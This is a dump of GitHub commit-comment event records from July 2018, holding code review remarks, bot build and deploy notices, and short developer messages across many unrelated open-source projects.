{"id":"7960916163","type":"CommitCommentEvent","actor":{"login":"nunobrum"},"repo":{"name":"jaccharrison/PyLTSpice"},"payload":{"comment":{"id":29696804,"position":null,"line":null,"path":null,"commit_id":"a80f4b64e87ba1bcb998978adec78c74b55ff8d5","created_at":"2018-07-13T08:58:21Z","updated_at":"2018-07-13T08:58:21Z","author_association":"NONE","body":"Hi there,\r\nNice work. I'll merge your changes back to my repo.\r\nI can add you as a user if you so wish.  If you have any doubts, let me know.\r\n\r\nBest Regards,\r\nNuno"}},"created_at":"2018-07-13T08:58:21Z"}
{"id":"7960916491","type":"CommitCommentEvent","actor":{"login":"qsm-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29696806,"position":null,"line":null,"path":null,"commit_id":"edd8bad5d97ee489e85504791c807f0099ef24b5","created_at":"2018-07-13T08:58:25Z","updated_at":"2018-07-13T08:58:25Z","author_association":"CONTRIBUTOR","body":"@tivisse https://github.com/odoo/odoo/commit/edd8bad5#diff-09ef1b9fd02a3402bd0e1ec77f8320ffR6 you create a record for a model that does not exist in this app :wink:\r\n\r\n`website_sale_comparison` declares the model and `website_sale_options` does not depend on that one (it works on the runbot by chance)"}},"created_at":"2018-07-13T08:58:25Z"}
{"id":"7960918265","type":"CommitCommentEvent","actor":{"login":"laurentalacoque"},"repo":{"name":"mbaddeley/TouchSelfie"},"payload":{"comment":{"id":29696809,"position":null,"line":null,"path":null,"commit_id":"2c1080251ba0eacfaa9b7091d0742466b52da3fa","created_at":"2018-07-13T08:58:46Z","updated_at":"2018-07-13T08:58:46Z","author_association":"NONE","body":"Hi,\r\nThis potentially is a bad idea, see [this stackoverflow response](https://stackoverflow.com/a/25597526/940745)\r\n"}},"created_at":"2018-07-13T08:58:46Z"}
{"id":"7960924990","type":"CommitCommentEvent","actor":{"login":"laurentalacoque"},"repo":{"name":"mbaddeley/TouchSelfie"},"payload":{"comment":{"id":29696831,"position":null,"line":null,"path":null,"commit_id":"2c1080251ba0eacfaa9b7091d0742466b52da3fa","created_at":"2018-07-13T09:00:08Z","updated_at":"2018-07-13T09:00:08Z","author_association":"NONE","body":"This is potentially a bad idea, see [this stackoverflow response](https://stackoverflow.com/a/25597526/940745)"}},"created_at":"2018-07-13T09:00:08Z"}
{"id":"7960925422","type":"CommitCommentEvent","actor":{"login":"dengziyang3"},"repo":{"name":"dengziyang3/BigDataCommon"},"payload":{"comment":{"id":29696833,"position":null,"line":null,"path":null,"commit_id":"fd27db5ba351f35392eadccf5e7cbfbc4c136175","created_at":"2018-07-13T09:00:13Z","updated_at":"2018-07-13T09:00:13Z","author_association":"OWNER","body":"修改人：邓紫阳\r\n修改内容：离线告警数据查询返回结果\r\n修改模块：starepo\r\n合入人：赵喆\r\n合入时间：2018-07-13\r\n合入分支：master"}},"created_at":"2018-07-13T09:00:13Z"}
{"id":"7960926390","type":"CommitCommentEvent","actor":{"login":"benblumson"},"repo":{"name":"benblumson/Mereology"},"payload":{"comment":{"id":29696842,"position":511,"line":511,"path":"Mereotopology.thy","commit_id":"259833fb458a52021b2353e189166cd847f0e9a1","created_at":"2018-07-13T09:00:22Z","updated_at":"2018-07-13T09:00:22Z","author_association":"OWNER","body":"It should be GEMTC... I did a search and replace for \"MTC\" with \"monotonicity\" which must have caused this."}},"created_at":"2018-07-13T09:00:22Z"}
{"id":"7960928864","type":"CommitCommentEvent","actor":{"login":"benblumson"},"repo":{"name":"benblumson/Mereology"},"payload":{"comment":{"id":29696846,"position":465,"line":465,"path":"Mereotopology.thy","commit_id":"259833fb458a52021b2353e189166cd847f0e9a1","created_at":"2018-07-13T09:00:50Z","updated_at":"2018-07-13T09:00:50Z","author_association":"OWNER","body":"Has the name of the lemma changed?"}},"created_at":"2018-07-13T09:00:50Z"}
{"id":"7960928931","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/stroyprombeton"},"payload":{"comment":{"id":29696847,"position":null,"line":null,"path":null,"commit_id":"4b62c6aa548bc4ecb3b6aec2b2c9b18b736895d7","created_at":"2018-07-13T09:00:51Z","updated_at":"2018-07-13T09:00:51Z","author_association":"COLLABORATOR","body":"Puzzle `380-a9650120` discovered in   [`stroyprombeton/tests/tests_selenium_admin.py`](  https://github.com/fidals/stroyprombeton/blob/master/stroyprombeton/tests/tests_selenium_admin.py)   and submitted as #248. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-13T09:00:51Z"}
{"id":"7960929196","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/stroyprombeton"},"payload":{"comment":{"id":29696848,"position":null,"line":null,"path":null,"commit_id":"4b62c6aa548bc4ecb3b6aec2b2c9b18b736895d7","created_at":"2018-07-13T09:00:54Z","updated_at":"2018-07-13T09:00:54Z","author_association":"COLLABORATOR","body":"I wasn't able to retrieve PDD puzzles from the code base and submit them to GitHub. If you think that it's a bug on our side, please submit it to [yegor256/0pdd](https://github.com/yegor256/0pdd/issues):\n\n> GET https://api.github.com/repos/fidals/stroyprombeton/issues/380: 404 - Not Found // See: https://developer.github.com/v3/issues/#get-a-single-issue\n\n\nPlease, copy and paste this stack trace to GitHub:\n\n\n```\nOctokit::NotFound\nGET https://api.github.com/repos/fidals/stroyprombeton/issues/380: 404 - Not Found // See: https://developer.github.com/v3/issues/#get-a-single-issue\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/response/raise_error.rb:16:in `on_complete'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/response.rb:9:in `block in call'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/response.rb:61:in `on_complete'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/response.rb:8:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/middleware/follow_redirects.rb:73:in `perform_with_redirection'\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/middleware/follow_redirects.rb:61:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/rack_builder.rb:143:in `build_response'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/connection.rb:387:in `run_request'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/connection.rb:138:in `get'\n/app/vendor/bundle/ruby/2.3.0/gems/sawyer-0.8.1/lib/sawyer/agent.rb:94:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/connection.rb:156:in `request'\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/connection.rb:19:in `get'\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/client/issues.rb:114:in `issue'\n/app/objects/github_tickets.rb:39:in `notify'\n/app/objects/logged_tickets.rb:36:in `notify'\n/app/objects/github_tagged_tickets.rb:36:in `notify'\n/app/objects/commit_tickets.rb:34:in `notify'\n/app/objects/emailed_tickets.rb:31:in `notify'\n/app/objects/sentry_tickets.rb:36:in `notify'\n/app/objects/diff.rb:38:in `block in notify'\n/app/objects/diff.rb:33:in `each'\n/app/objects/diff.rb:33:in `notify'\n/app/objects/job.rb:40:in `proceed'\n/app/objects/job_starred.rb:33:in `proceed'\n/app/objects/job_recorded.rb:32:in `proceed'\n/app/objects/job_emailed.rb:35:in `proceed'\n/app/objects/job_commiterrors.rb:36:in `proceed'\n/app/objects/job_detached.rb:48:in `exclusive'\n/app/objects/job_detached.rb:36:in `block in proceed'\n/app/objects/job_detached.rb:36:in `fork'\n/app/objects/job_detached.rb:36:in `proceed'\n/app/0pdd.rb:342:in `block in <top (required)>'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `block in compile!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (3 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1011:in `route_eval'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (2 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1039:in `block in process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:990:in `block in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `each'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1096:in `block in dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1093:in `dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `block in call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:913:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/xss_header.rb:18:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/path_traversal.rb:16:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/json_csrf.rb:26:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/frame_options.rb:31:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/logger.rb:15:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/common_logger.rb:33:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:231:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:224:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/head.rb:12:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/method_override.rb:22:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:194:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1957:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `block in call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1728:in `synchronize'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/handler/webrick.rb:86:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:140:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:96:in `run'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/server.rb:296:in `block in start_thread'\n```"}},"created_at":"2018-07-13T09:00:54Z"}
{"id":"7960932620","type":"CommitCommentEvent","actor":{"login":"Kokan"},"repo":{"name":"balabit/syslog-ng"},"payload":{"comment":{"id":29696855,"position":27,"line":27,"path":"modules/redisq/CMakeLists.txt","commit_id":"00dcd230012c8349da01133c324d5ffdbcb979c1","created_at":"2018-07-13T09:01:34Z","updated_at":"2018-07-13T09:01:34Z","author_association":"MEMBER","body":"I see now that it was not the best with `diskq` as well."}},"created_at":"2018-07-13T09:01:34Z"}
{"id":"7960939273","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29696872,"position":105,"line":105,"path":"Dodo.Tests/BoardsControllerTests.cs","commit_id":"3cce5ea7b475acab7f88152bacd789e4f4685f41","created_at":"2018-07-13T09:02:56Z","updated_at":"2018-07-13T09:02:56Z","author_association":"MEMBER","body":"Ребята, в этом тесте вы конкретно упоролись.\r\n1. Сетап сложный шопипец\r\n2. foreach в Assert\r\n3. тестовые данные, которые важны для теста (что именно 5 заказов) зарыты в DSL, в тесте их не видно\r\n\r\nЗачем вы придумываете себе сложности на ровном месте? Есть же прекрасная логика, которая прямо кричит - покрой меня тестами на поведение, детка!\r\nНапример \r\n`var clientTreatment = pizzeria.ClientTreatment;\r\n            ClientIcon[] icons = { };\r\n            if (clientTreatment == ClientTreatment.RandomImage)\r\n            {\r\n                icons = _clientsService.GetIcons();\r\n            }`"}},"created_at":"2018-07-13T09:02:56Z"}
{"id":"7960940374","type":"CommitCommentEvent","actor":{"login":"Kokan"},"repo":{"name":"balabit/syslog-ng"},"payload":{"comment":{"id":29696873,"position":36,"line":36,"path":"modules/redisq/redisq-grammar.ym","commit_id":"00dcd230012c8349da01133c324d5ffdbcb979c1","created_at":"2018-07-13T09:03:09Z","updated_at":"2018-07-13T09:03:09Z","author_association":"MEMBER","body":"Are those includes needed here? \r\n```C\r\n#include \"syslog-names.h\"\r\n#include \"messages.h\"\r\n```"}},"created_at":"2018-07-13T09:03:09Z"}
{"id":"7960941368","type":"CommitCommentEvent","actor":{"login":"hnes"},"repo":{"name":"hnes/libaco"},"payload":{"comment":{"id":29696878,"position":null,"line":null,"path":null,"commit_id":"571c5b7d75bcd15c4eb81258c5cad9ac5bd5618e","created_at":"2018-07-13T09:03:20Z","updated_at":"2018-07-13T09:03:20Z","author_association":"OWNER","body":"Thank you very much for your advice, Markus. \r\nI'll keep that in mind and will not mix them anymore."}},"created_at":"2018-07-13T09:03:20Z"}
{"id":"7960944539","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29696887,"position":112,"line":112,"path":"Dodo.Tests/BoardsControllerTests.cs","commit_id":"3cce5ea7b475acab7f88152bacd789e4f4685f41","created_at":"2018-07-13T09:04:00Z","updated_at":"2018-07-13T09:04:00Z","author_association":"MEMBER","body":"Ужасно, ужасно читается тест. Нифига не понятно :("}},"created_at":"2018-07-13T09:04:00Z"}
{"id":"7960945278","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29696890,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-13T09:04:10Z","updated_at":"2018-07-13T09:04:10Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-13T09:04:10Z"}
{"id":"7960945983","type":"CommitCommentEvent","actor":{"login":"downtiser"},"repo":{"name":"downtiser/python-one"},"payload":{"comment":{"id":29696891,"position":88,"line":88,"path":"note2:string encode and list","commit_id":"5e186d11ca7e02a898b6924fe748f99e08b44891","created_at":"2018-07-13T09:04:18Z","updated_at":"2018-07-13T09:04:18Z","author_association":"OWNER","body":"### Addition:\r\nAnother three methods to achieve a simple copy:\r\n\r\n```\r\nimport copy\r\nperson=['name',[saving,100]]\r\np1=copy.copy(person)\r\np1=person[ : ]\r\np1=list(person)\r\n```\r\nthe use of simple copy:\r\nTo create a chain between two lists:\r\ne.g: a mutual bank account of a couple\r\n\r\n```\r\nhusband=person[ : ]\r\nwife=person[ : ]\r\nhusband[0]='Jacket'\r\nwife[0]='Mary'\r\nperson[1][1]=50\r\nprint(husband wife)\r\n>>>['Jacket', ['saving', 50]] ['Mary', ['saving', 50]]\r\n```\r\n"}},"created_at":"2018-07-13T09:04:18Z"}
{"id":"7960946500","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29696892,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-13T09:04:24Z","updated_at":"2018-07-13T09:04:24Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-13T09:04:24Z"}
{"id":"7960951179","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29696896,"position":112,"line":112,"path":"Dodo.Tests/BoardsControllerTests.cs","commit_id":"3cce5ea7b475acab7f88152bacd789e4f4685f41","created_at":"2018-07-13T09:05:23Z","updated_at":"2018-07-13T09:05:23Z","author_association":"MEMBER","body":"Сколько нужно элементов в коллекции, чтобы проверить логику на четность? Почему их 5?"}},"created_at":"2018-07-13T09:05:23Z"}
{"id":"7960953320","type":"CommitCommentEvent","actor":{"login":"dshoulders"},"repo":{"name":"manywho/ui-offline"},"payload":{"comment":{"id":29696903,"position":44,"line":37,"path":"js/services/PageConditions.ts","commit_id":"a51fc84517caa331c2d72025a9556863f95f4ef9","created_at":"2018-07-13T09:05:49Z","updated_at":"2018-07-13T09:05:49Z","author_association":"NONE","body":"A bit of weird formatting here"}},"created_at":"2018-07-13T09:05:49Z"}
{"id":"7960956466","type":"CommitCommentEvent","actor":{"login":"ohjinnoo"},"repo":{"name":"ohjinnoo/project"},"payload":{"comment":{"id":29696909,"position":null,"line":null,"path":null,"commit_id":"e487398cfdea5046a7867eb8897744f599fe909c","created_at":"2018-07-13T09:06:27Z","updated_at":"2018-07-13T09:06:27Z","author_association":"OWNER","body":"Leave a comment"}},"created_at":"2018-07-13T09:06:27Z"}
{"id":"7960957110","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-smbc-bot"},"payload":{"comment":{"id":29696910,"position":null,"line":null,"path":null,"commit_id":"93272c2717827a235cd614936ce25178b4ca97a7","created_at":"2018-07-13T09:06:33Z","updated_at":"2018-07-13T09:06:33Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/59483139-581b-420d-90f0-d1a4f85c757d?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-smbc-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/60053b78-cf64-42ea-8ce3-3ba3ce629cf0?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-smbc-bot\") deployed [watsonwork-smbc-bot](https://github.com/WilliamHolmes/watsonwork-smbc-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180713-090632 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180713-090632\") to [dev](https://console.bluemix.net/apps/614b28c8-bbda-4a4b-b0da-a51b1e3ed64a?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-13T09:06:33Z"}
{"id":"7960965018","type":"CommitCommentEvent","actor":{"login":"Jojo-Schmitz"},"repo":{"name":"musescore/MuseScore"},"payload":{"comment":{"id":29696933,"position":24,"line":66,"path":"mscore/startcenter.cpp","commit_id":"0dbfa11f3b1c0e67b27b457238a25ad731d60149","created_at":"2018-07-13T09:08:15Z","updated_at":"2018-07-13T09:08:15Z","author_association":"CONTRIBUTOR","body":"You'd need ti comment out the `if (enableExperimental)` as well"}},"created_at":"2018-07-13T09:08:15Z"}
{"id":"7960968117","type":"CommitCommentEvent","actor":{"login":"Lega10"},"repo":{"name":"Lega10/contoh"},"payload":{"comment":{"id":29696935,"position":null,"line":null,"path":null,"commit_id":"9110f4c83d65d753c1b633ac3642a860cfe2e5b0","created_at":"2018-07-13T09:08:54Z","updated_at":"2018-07-13T09:08:54Z","author_association":"OWNER","body":"ini apa maksudnya"}},"created_at":"2018-07-13T09:08:54Z"}
{"id":"7960975143","type":"CommitCommentEvent","actor":{"login":"marcoabreu"},"repo":{"name":"apache/incubator-mxnet"},"payload":{"comment":{"id":29696948,"position":5,"line":21,"path":"ci/docker/install/tensorrt.sh","commit_id":"36ccba1999d1d67437ac20e428707c98ffaba1c5","created_at":"2018-07-13T09:10:21Z","updated_at":"2018-07-13T09:10:21Z","author_association":"CONTRIBUTOR","body":"@szha is this safe to use or shall we rather pin the version? WDYT?"}},"created_at":"2018-07-13T09:10:21Z"}
{"id":"7960985111","type":"CommitCommentEvent","actor":{"login":"obeliskos"},"repo":{"name":"LokiJS-Forge/LokiDB"},"payload":{"comment":{"id":29696975,"position":null,"line":null,"path":null,"commit_id":"73e63ea24a5cc9d020d02a8a23bf5adac8babc96","created_at":"2018-07-13T09:12:22Z","updated_at":"2018-07-13T09:12:22Z","author_association":"COLLABORATOR","body":"@Viatorus : I fixed several coverage areas so that codecov heatmap turned all green so i can't really tell where remaining issues are.  Seems like just (typescript required) null checks.  Perhaps you can spot the reason.\r\n\r\nI felt it appropriate to go ahead and check in... I will delete binarytree index branch and add new one for removal/replacement of old binary index, along with looking into the upgrade path."}},"created_at":"2018-07-13T09:12:22Z"}
{"id":"7960986675","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29696978,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-13T09:12:39Z","updated_at":"2018-07-13T09:12:39Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-13T09:12:39Z"}
{"id":"7960988387","type":"CommitCommentEvent","actor":{"login":"Araq"},"repo":{"name":"pragmagic/karax"},"payload":{"comment":{"id":29696983,"position":6,"line":24,"path":"karax/karaxdsl.nim","commit_id":"015590e8060402f9f31a16f6de1d6371f64c3317","created_at":"2018-07-13T09:12:59Z","updated_at":"2018-07-13T09:12:59Z","author_association":"COLLABORATOR","body":"I think you're misreading this code. The 3 means an AST with 3 children. And it's not a single '-' either because this code is recursive. ;-) "}},"created_at":"2018-07-13T09:12:59Z"}
{"id":"7960988730","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":29696985,"position":8,"line":84,"path":"resources/qml/JobSpecs.qml","commit_id":"bb313c45a9465d4097b3b4d3a31ed6f99ceca278","created_at":"2018-07-13T09:13:03Z","updated_at":"2018-07-13T09:13:03Z","author_association":"CONTRIBUTOR","body":"isn't \"Untitled\" a more common name for documents-without-a-name?"}},"created_at":"2018-07-13T09:13:03Z"}
{"id":"7960993433","type":"CommitCommentEvent","actor":{"login":"hnes"},"repo":{"name":"hnes/libaco"},"payload":{"comment":{"id":29696990,"position":null,"line":null,"path":null,"commit_id":"7290791cc1a2ee81ee04c3f85e6c16fe2b32fef6","created_at":"2018-07-13T09:14:01Z","updated_at":"2018-07-13T09:14:01Z","author_association":"OWNER","body":"This Makefile is just a temporary demonstration and will be substituted when our formal build system generator arrives (I should have commented on it clearly)."}},"created_at":"2018-07-13T09:14:01Z"}
{"id":"7960998737","type":"CommitCommentEvent","actor":{"login":"yuanwen19871003"},"repo":{"name":"yuanwen19871003/123456"},"payload":{"comment":{"id":29697005,"position":null,"line":null,"path":null,"commit_id":"00c8d07af9db798a1ccd23d26d2ddf27ff1108df","created_at":"2018-07-13T09:15:07Z","updated_at":"2018-07-13T09:15:07Z","author_association":"OWNER","body":"111"}},"created_at":"2018-07-13T09:15:07Z"}
{"id":"7961005995","type":"CommitCommentEvent","actor":{"login":"Vaarteen"},"repo":{"name":"OpenClassrooms-Student-Center/alumnis"},"payload":{"comment":{"id":29697029,"position":null,"line":null,"path":null,"commit_id":"c5f4fa2a9c224ae9fd51d90aa9f8d8ff81f50029","created_at":"2018-07-13T09:16:34Z","updated_at":"2018-07-13T09:16:34Z","author_association":"CONTRIBUTOR","body":"C'est bon, tout est corrigé, je valide."}},"created_at":"2018-07-13T09:16:34Z"}
{"id":"7961014305","type":"CommitCommentEvent","actor":{"login":"kyuupichan"},"repo":{"name":"spesmilo/electrum"},"payload":{"comment":{"id":29697039,"position":null,"line":null,"path":null,"commit_id":"92e510f8aa31ebf75a3b55fae28c62db8cef6d19","created_at":"2018-07-13T09:18:16Z","updated_at":"2018-07-13T09:18:16Z","author_association":"COLLABORATOR","body":"I think all servers are now running code where this no longer happens.\r\n\r\nThe protocol should be improved here:  histories should be confirmed only, and mempool txs served separately."}},"created_at":"2018-07-13T09:18:16Z"}
{"id":"7961021619","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29697049,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-13T09:19:46Z","updated_at":"2018-07-13T09:19:46Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-13T09:19:46Z"}
